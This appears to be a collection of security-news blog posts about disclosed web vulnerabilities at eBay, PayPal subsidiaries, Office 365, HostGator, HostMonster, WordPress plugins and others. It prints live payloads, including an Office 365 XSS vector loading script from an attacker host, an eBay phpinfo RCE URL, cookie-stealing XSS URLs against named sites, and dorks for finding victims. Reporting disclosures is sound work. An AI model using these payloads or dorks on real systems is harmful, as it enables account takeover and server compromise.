Researcher finds vulnerability in eBay and claims he uploaded a shell

 
Jordan Jones(@CEHSecurity), a Security researcher, claims to have discovered a critical security vulnerability in the eBay website for employees that allowed him to upload a backdoor shell.

Jordan said in his tweet that he notified about the vulnerability to eBay.  A screenshot published in his twitter account shows that he is able to upload a 'shell.php' file in the following location:

"https://dsl.ebay.com/wp-includes/Text/Diff/Engine/shell.php"
At the time of writing, the file is still there.   The last modified date of the file is December 2012. It is quite possible to modify the TimeStamp. So, we are not sure from when the file is there.

Trying to access the shell ends up in blank page.  It means either the researcher have modified the shell to run only when a particular input is passed or it is not a shell.

Jordan have also discovered a cross site scripting vulnerability in the eBay Research Labs page(labs.ebay.com).

Critical SSRF vulnerability in Paypal's subsidiary allows to access Internal Network

Shubham Shah, a web application pentester from Australia, has discovered a critical Server Side Request Forgery(SSRF) vulnerability in the Bill Me Later website, a subsidiary of Paypal. The vulnerability exists in the subdomain(merchants.billmelater.com).

"The vulnerability itself was found within a test bed for BillMeLater’s SOAP API, which allowed for queries to be made to any given host URL." researcher explained in his blog post.

An attacker is able to send request to any internal network through the API and get the response.  Some internal admin pages allowed him to query internal databases without asking any login credentials.

Researcher says that a successful exploitation may result in compromising the customers data.

The bug was reported to Paypal on October 2013 and he got reward from them on Jan. 2014.

Paypal has partially fixed the bug by restricting the SOAP API to access the internal servers.  However, researcher says that it still act as proxy to view other hosts.

If you would like to know more details about SSRF vulnerability and how it can be exploited for port scanning or internal network finding, you can refer the Riyaz Waliker blog post and this document.

Express Language(EL) Injection vulnerability in Paypal's subsidiary

An Indian Security researcher Piyush Malik has discovered an Expression Language(EL) Injection security flaw in Zong, a subsidiary of Paypal.

According to OWASP, EL Injection is a vulnerability that allows hacker to control data passed to the EL Interpreter.  In some cases, it allows attackers to execute arbitrary code on the server.

Researcher Malik said in his blog that Zong was running an outdated version of Clearspace(Now known as Jive software) on a subdomain.

"Clearspace is a Knowledge management tool and is Integrated with Spring Framework. EL Pattern was used in Spring JSP Tags which made Clearspace Vulnerable to this Bug." Malik explained in his blog.

He found two forms in the site which are vulnerable to this bug. He was able to perform some arithmetic operations using the vulnerable field.

One of the vulnerable urls:
https://clearspace.zong.com/login!input.jspa?unauth=${custom command here}

An attacker can inject a Express Language command on the 'unauth' field which will be executed in the server.  In his demo, researcher inject an arithmetic command(https://clearspace.zong.com/login!input.jspa?unauth=${100*3}) and able to executed it.

Paypal has offered some bounty amount for his finding.  Researcher didn't disclose the bounty amount.

About EL Injection vulnerability is first documented by security researchers from Minded Security in 2011.  You can find the document here: https://www.mindedsecurity.com/fileshare/ExpressionLanguageInjection.pdf

CVE-2014-0050: Apache Tomcat vulnerable to Denial of service attack

If you are a developer, you should always be careful when writing loops especially an endless loops [ for(;;) or while(true) ] which are coded to be stopped by an 'if' statement.

Security researchers from TrustWave have explained how an endless 'for' loop resulted in a denial of service vulnerability that could allow attackers to launch DOS attacks against websites hosted on Apache Tomcat servers.

The vulnerability(CVE-2014-0050) is located in Apache Commons FileUpload file.  The 'for' loop in the file is coded in such a way that it will be stopped by raising an exception or by returning a value. 

An attacker can send a malformed 'Content-type' header for a multipart request which could result in an infinite loop.

Multipart is often used in HTTP request for uploading files.  Values in the multipart requests are separated by a magic line called "boundary".  Boundary is a random string which will be defined in the 'content-type' header.

By sending a boundary value longer than 4091 characters and 'body' longer than 4096 characters, the 'for' loop won't be stopped by both 'if' statement.

TrustWave researchers managed to send four times a request containing more than 4091 characters in the boundary field that forces vulnerable tomcat server into an infinite loop.  As a result, the tomcat server will end up in consuming all available CPU resources until it is stopped.

Thousands of Joomla websites using JomSocial vulnerable to Remote Code Execution

Thousands of Joomla websites using JomSocial are vulnerable to Remote Code Execution vulnerability.  JomSocial is a social networking extension for Joomla CMS.

The extension is currently listed on the Joomla's Vulnerable Extension list.  The vulnerability is being exploited in the wild, several users have reported that someone had hacked into their website.

According to JomSocial, hackers breached JomSocial website by exploiting this vulnerability.  The security experts at JomSocial have spotted the attack and released a patch for this vulnerability.  While analyzing the vulnerability which is being exploited, they also discovered another critical vulnerability.

The vulnerability was discovered by a security researcher Matias Fontanini.  He notified JomSocial about the vulnerability.  At first, the team said that they have fixed the issue in the 3.1.0.1. However, researcher found 3.1.0.1 is also vulnerable.

Vulnerability Details:
The vulnerability is located in the 'photos' controller, 'ajaxUploadAvatar' task. The parameters parsed by the 'Azrul' plugin are not properly sanitized before being used in a call to the 'call_user_func_array' PHP function.

"This allows an attacker to execute arbitrary static class functions, using any amount of user-provided parameters."  An attacker can exploit this vulnerability by calling CStringHelper::escape function and execute arbitrary PHP code.

HTTP Request exploiting the vulnerability

More technical details about the vulnerability and exploit code is available here.

As you can see that exploit code is already publicly available, all JomScoial Admins are advised to upgrade to latest version of the extension (v3.1.0.4) as soon as possible.

Critical Remote Code Execution vulnerability patched in MediaWiki, affecting WikiPedia

A Critical Remote Code Execution vulnerability has recently been patched the Mediawiki in its wiki Software.  Thousands of Wiki sites including WikiPedia have been impacted by this security bug.

Security researchers from Checkpoint identified this vulnerability(CVE-2014-1610) affecting all versions starting with version 1.8.  The websites are vulnerable only, if a specific non-default setting is enabled.

According to the security advisory, an attacker could have exploited this vulnerability to make file and system changes and gained complete control over the server.

Checkpoint said that an attacker could have injected malware code into every page WikiPedia.org which could have put millions of users' system at potential risk of malware infection.

Fortunately, Checkpoint immediately informed the WikiMedia foundation about the presence this security bug.  On 28th Jan., the foundation released patch for this bug.

The security advisory says that this is the third critical remote code execution vulnerability discovered in MediaWiki since 2006.

Persistent XSS Vulnerability in Office 365 website allows to hack Admin account



Cogmotive firm has discovered a potentially critical persistent cross site scripting(XSS) vulnerability in the Office 365 - a cloud version of office.  A successful exploitation allows attacker to take control of the administrator account.

To exploit this vulnerability, you have to be one of the user.  A malicious employee can change their own Display name to XSS vectors.

For instance, an attacker can modify his display name to the following script:
/*-->]]>%>?></object></script></title></textarea></noscript></style></xmp>'-/"///><img id="b1" src=1 onerror='$.getScript("https://[attacker_website]/exploit/b.js", function() { c(); });'>'
User administration page usually display the list of users in the portal.  So, if an user changes his name, it will be reflected in that page.

When an admin user log into the portal and access the "User administration" page, the payload will get executed.  It will load the malicious javascript file hosted in attacker's server and execute.

An attacker can exploit this vulnerability to create administrator within the company’s Office 365 environment.

"It is worth noting that this weakness seems to have been introduced recently within the new Wave 15 version of Office 365." Alan Byrne, Co-founder of Cogmotive said in company's blog.

Alan immediately reported the bug to Microsoft on October 2013.  On December 2013, Microsoft patched the vulnerability.




Thousands of websites infected via Vulnerability in WordPress OptimizePress Theme


A file upload vulnerability in the OptimizePress theme allowed attackers to infect thousands of Wordpress websites, reports Sucuri.

The vulnerability in question is at "lib/admin/media-upload.php" location that allows anyone to upload any kind of files to the "wp-content/uploads/optpress/images_comingsoon" folder.

Sucuri Team has detected that more than 2,000 websites using the Optimizepress theme have been compromised.  All of the compromised sites have been injected with iFrame to same malicious domain.

Almost 75% infected websites have already been blacklisted in Google Safe browsing.

If you are using the above theme, you are urged to immediately upgrade to the latest version.  Otherwise, you will soon find yourself victim to malware infection. 

Vulnerability in Drupal allows hackers to compromise admin accounts


A Highly critical vulnerability has been identified in the OpenID module used by Drupal affecting 6.x and 7.x versions.

The vulnerability allows hacker to compromise any accounts including Admin account.

There is another security vulnerability "Access bypass " estimated as moderately critical can be exploited by an attacker to access unpublished content.

These vulnerabilities have been patched in the latest version of Drupal 6.30 and 7.26.  The latest versions don't have any new features but users are advised to upgrade.

"[The first] vulnerability is mitigated by the fact that the malicious user must have an account on the site (or be able to create one), and the victim must have an account with one or more associated OpenID identities." security advisory reads. 

Remote Code Execution vulnerability in Ebay website

David Vieira-Kurz, a Security researcher from Germany, has discovered an interesting Remote Code execution vulnerability in the eBay website.

The 'q' parameter in the 'search' page of South Asian Ebay domain (sea.ebay.com/search/?q=david&catidd=1) is found to be vulnerable to remote code execution.

The researcher cleverly managed to pass the 'q' parameter as array with a command that successfully got executed.

Proof of concept provided by the researcher prints the information about the PHP running on the server:
  sea.ebay.com/search/?q[0]=david&q[1]=sec{${phpinfo()}}&catidd=1

An attacker could have exploited this vulnerability to run OS commands and managed to compromise the entire server.  However, David reported about this vulnerability to eBay security team, the vulnerability has been fixed now.

He also discovered a SQL Injection vulnerability in the same domain last year.

The full technical details is available here.

OpenEMR affected by Multiple Vulnerabilities

The most popular open source electronic medical records (OpenEMR) is said to have multiple vulnerabilities by the Trustwave SpiderLabs.

It reported that with a guest access, mixed with some application issues the user was able to compromise with the server running OpenEMR and it even served as a dock for attacking the internal networks.

The Researcher found a SQL Injection vulnerability in "Reports > Visits > SuperBill > Dates" location. 

"By browsing to this page and dumping in junk in either the start or end date parameters", he saw the SQL error message saying "ERROR: query failed: select * from forms where form_name = 'New Patient Encounter' and date between 'a'' and '2013-07-12' order by date DESC"

It also claimed to dump most of the database contents and important datas of patients as well as numerous usernames and passwords." I let my GPU box chew on the password hashes for a bit, and kept poking at the application." (the blog says)

OpenEMR is also reported to have HTML injection/XSS on an 'Office Notes' page. The user was even able to beguile the user visiting the page to attempt authentication with his system, which was hosting a fake SMB server with static challenges:

Image Credits: SpiderLabs

"This allowed me to capture a handful of domain usernames and password hashes. In addition, I had some luck cracking the OpenEMR password hashes from earlier, and some of the passwords were re-used locally on the Linux system hosting OpenEMR, allowing me access via SSH."(SpiderLabs reports)

The OpenEMR has been informed of it and they have patched the vulnerabilities in the latest 4.1.1 patch.

Author: Shalini Bhushan


Reflected XSS vulnerability affects Millions of sites hosted in HostMonster

Recently, We reported about the Reflected Cross Site scripting vulnerability in the HostGator India hosting site that affects millions of hosted sites. Today, Another Indian Security Researcher , Ramneek Sidhu , come with another interesting find.

Ramneek Sidhu has discovered Reflected XSS Vulnerability in One of the Biggest WebHosting site "HostMonster" (hostmonster.com). Just like in the previous case, this Vulnerability affects all sites hosted in the HostMonster.



The vulnerability discovered in Subdomain of Hostmonster:
http://host104.hostmonster.com/"><SCRIPT>alert(document.cookie)</SCRIPT><SCRIPT>alert("Evolution of Revolution")</script><img src="http://i49.tinypic.com/1zq7cyp.jpg /" />
The vulnerability was reported to Aarshit Mittal by the Security Researcher.  Aarshit started to analyze the vulnerability and find few more interesting things. He discovered that each and every websites hosted in the Hostmonster vulnerable to Reflected XSS.

Find the list of sites hosted in Hostmonster.  You can do this by searching for "Ip:ip:74.220.207.104" in Bing.  This single IP search gives 36,000 results.  All of those sites are affected by this security flaw.  For instance, let us take "vividhbharti.com".

The POC for this site is:
http://vividhbharti.com/"><SCRIPT>alert(document.cookie)</SCRIPT><SCRIPT>alert("Evolution of Revolution")</script><img src="http://i49.tinypic.com/1zq7cyp.jpg /" />
At EHN, i have just Analyzed the affected sites to know what cause this security flaw. It seems like this flaw occured when the developer try to display the ads in the 404 not found page.


There is a javascript code that generate ads.  Interestingly, the code uses referrer . The referrer is the current address.  Unfortunately, the developers fails to sanitize the url. This results in Reflected XSS.

Millions of sites hosted in Hostgator India vulnerable to Reflected XSS


HostGator is one of the leading Web hosting provider found to be vulnerable to Non-Persistent Cross Site scripting vulnerability.  The vulnerability was discovered by Indian Security Researcher "Manjot Gill". The finding was intially published in one of my Friend Aarshit Mittal Security News portal Cyber-N.

The Researcher Manjot discovered the vulnerability in Subdomain of Hostgator.  He also claimed that lot of sites hosted in Hostgator are vulnerable to.

Poc for the Subdomain XSS:
http://www.cluster2.hostgator.co.in/"><script>alert("HACKED BY ICH ")</script>
Aarshit Mittal analyzed the finding and he discovered few more interesting things. 

Search for "site:.hostgator.co.in", you will get more than 64,600 results. All of those subdomains are affected by this vulnerability. For Example take the first site from the result, "chahat.hostgator.co.in". It is affected by the XSS.


POC:
chahat.hostgator.co.in/"><script>alert(document.cookie)</script>
Also, you can search for the list of sites hosted by searching for the IP dork in Bing. For Instance , search for "ip:119.18.48.78" in Bing will result the list of affected sites.

You can find the rest of vulnerable sites by changing the ip from "119.18.48.12" to "119.18.48.86".


Also the main domain is also affected by this vulnerability:

     http://www.hostgator.co.in/"><script>alert(document.cookie)</script>

The affected sites are created and hosted via the IndiaGetOnline (www.indiagetonline.in). "Get India Business Online" is an initiative by Google that allows you to create a website for your business in 15 minutes, for free.  HostGator is providing you with hosting, their leading site building tool, and support.

All the sites created by Hostgator "Site building tool" are affected by this vulnerability because of the main "site building" site(hostgator.co.in) itself affected by this security flaw.

Stored XSS vulnerability in Facebook and researcher got $3,500 Bug Bounty

A security Researcher Frans Rosén has discovered Cross Site Scripting vulnerability in Facebook and DropBox.

Initially , the researcher was working on finding security flaws on DropBox.  He noticed that when using their web interface there were some restrictions on what filenames that were allowed.  He tried to rename the file with '"><img src=x onerror=alert(document.domain)>.txt  But he got error message that some special characters are not allowed.

"But, if you instead, connected a local directory, created a file there and synced it, you got it inside Dropbox without any problems."The researcher explained in his blog. "Using this method I was able to find two issues with their notification messages showing unescaped filenames."

He notified DropBox about the vulnerability and they have successfully patched the flaw.

After some time, he noticed that there is connection between DropBox and Facebook. You can add files directly from DropBox to your Facebook groups. So he was curious to test the vulnerability in Facebook also.



In his Facebook group, he tried to add the previously uploaded file in the DropBox.  After he posted in the group, the xss attack didn't work.  But when he clicked the 'Share' link in the post, he got alert message.  Yes, Successfully, he managed to run the Script in Facebook.  The XSS also worked when he shared the crafted pin from the Pinterest.

Researcher got $3,500 USD bug bounty for notifying the vulnerability, facebook fixed the vulnerability now.

W3 Total Cache vulnerability allows hacker to steal password and db info


Jason A. Donenfeld has discovered a Critical vulnerability in one of the famous wordpress plugin "W3 Total Cache".  The plugin helps to improve the user experience of your site by improving your server performance, caching every aspect of your site.

The cache data is stored in public accessible directory, which means a malicious hacker can browse and download the password hashes and other database information.

A simple Google search for "inurl:wp-content/plugins/w3tc/dbcache" returns the list of word press affected by this vulnerability.

According to Jason, the cache files are by default publicly downloadable, and the key values / file names of the database cache items are easily predictable, even with directory listing off.

He also published a simple shell script to identify and exploit this bug:
http://git.zx2c4.com/w3-total-fail/tree/w3-total-fail.sh

Wordpress users are advised to either upgrade the plugin to new version or deny access to plugin directory by making an extra .htccess in that folder.

DNS Hijacking vulnerability found in 000webhost and other free hosting sites

Last month, we learned that hackers hacked the Pakistani google and other sites by hijacking DNS records.  Hackers modified the DNS records such that it points to freehostia site where attacker host the deface page.

Now, An Indian Security researcher Aarshit Mittal come with an interesting find , he has discovered critical DNS hijacking vulnerability in popular free web-hosting providers. The vulnerability allows attackers to take control of the websites hosted.

Aarshit has demonstrate how to exploit the vulnerability in his blog.  Attacker need to create an account in the target web hosting provider. He has explained the vulnerability with 000webhost.com.

Once you created the account, you should login into the CPanel where you can see the Shared IP address. Searching for that IP address with some keywords in Bing returns the sites hosted in that specific IP. 


Interestingly, Aarshit managed to find some government sites(csirt.gov.bd) that has been hosted in the 000webhost.  

After discovering the list of sites hosted , attacker can add those domain names to 'parked domains' in the CPanel. The CPanel successfully allowed him to add the domain name.

Now hacker just need to upload defacement page to his hosting account. Boom.! Now you can see the defacement page in the victim site. Also you can create lot of sub domains in the hijacked domains.

By exploiting this security flaw, researcher successfully hijacked the following domain:

  • test.fraymamertoesquiu.gov.ar
  • test.concejodeitagui.gov.co
  • dns.hviota.gov.co
  • test.digitizeyou.in
  • men.csirt.gov.bd
  • bd.csirt.gov.bd
A malicious hacker can hijack millions of sites hosted in free webhosting sites.  Aarshit try to contact affected companies, but they failed to respond for him.

List of affected sites:

  • www.freehostia.com/
  • www.freewebhostingarea.com/
  • x10hosting.com/
  • www.110mb.com/

Not only these sites are affected, there are plenty of free hosting server affected by this vulnerability.

WordPress Pingback Vulnerability Can Be Leveraged in DDoS Attacks


A pingback security bug exists in the Wordpress blogging platform may be exploited to launch distributed denial-of-service (DDoS) attacks, according to web application security firm Acunetix.

The vulnerability is exploitable through the platform’s XMLRPC API (through XMLRPC.PHP).

A malicious hacker can spoof a pingback to a specific blog in order to guess hosts inside each network they target, port scan those hosts, reconfigure internal routers or simply launch DDoS attacks.

The team successfully implemented an Acunetix WVS script to test this security flaw. This script will try to resolve various common internal hosts and try to connect to common ports. In the end, it will report the successful attempts.

Multiple vulnerabilities in Enterpriser16 LoadBalancer v7.1


Vulnerability-Lab researchers have found multiple persistent input validation web vulnerabilities in the  Enterpriser16 v7.1 Load Balancer Application.

The first vulnerabilities are located in the `Edit Configuration` module with the bound vulnerable Label, Virtual Host, Request to send, Email Alerts and Response expected parameters.

The secound vulnerabilities are located in the Create Solution, Access points and New Contract module with the bound vulnerable title, asset name, contract name, name or description parameter requests.

Exploitation requires low user interaction and a low privileged application user account. Successful exploitation of the vulnerability can lead to persistent session hijacking (manager/admin), persistent phishing or persistent module web context manipulation.

A detailed proof-of-concept can be found here.

Vulnerability Lab discovered persistent XSS vulnerability in Paypal

vulnerability lab

The Vulnerability Laboratory Research Team discovered persistent web vulnerability in the official Paypal (core) ecommerce website content management system.

The security flaw allows remote attackers to implement/inject own malicious script code on the application side (persistent).

The persistent input validation vulnerability is located in the Adressbuch module with the bound vulnerable search function when processing to request script code tags as `Addressbuch` contacts. The code will be executed out of the search result listing web context. Remote exploitation requires low user interaction and a privileged paypal banking application user account.

Successful exploitation of the vulnerability results in persistent session hijacking (admin), account steal via persistent phishing or persistent search module web context manipulation.

In an email sent to EHN, The Vulnerability has submitted the proof-of-concept for the security flaw. You can find the poc code here : http://pastebin.com/LhB82k4F

The name with the code was saved in the addressbook. Only the matching and successful result leads to the persistent execution of the web context.

When the other user is searching the existing account of the addressbook the code will be executed persistent out of the matching search result web context listing.

Few months after the vulnerability notified the Paypal , Paypal security team has successfully patched the vulnerability on December 11.

Stored XSS vulnerability in Tumblr can be used for Phishing and Malware attack

tumblr stored xss

Recently we reported that the reason behind the Tumblr reblog attack is Stored cross Site scripting(XSS) vulnerability. The vulnerability was discovered by a security researcher Janne Ahlberg. Janne says the vulnerability is not yet fixed.

According to his research, It is possible to embed JavaScript and some other HTML tags to certain Tumblr post types (e.g. video post).

The vulnerability can be used for launching phishing attacks.  For instance,it would be quite easy to ask input from user in various ways. User input could be stored to attackers server. Attacker could push malicious files from his/her server to Tumblr users.

"Attacker could create several Tumblr accounts and start blogging viral or popular videos using well chosen tags. Trust and popularity could be increased by using other accounts for reblogging video posts."Researcher described one possible attack scenario.

"Once the 'attack blog' would have enough followers, attacker could create a malicious post again with carefully selected tags. If the followers would reblog a malicious post, the spreading of payload would start."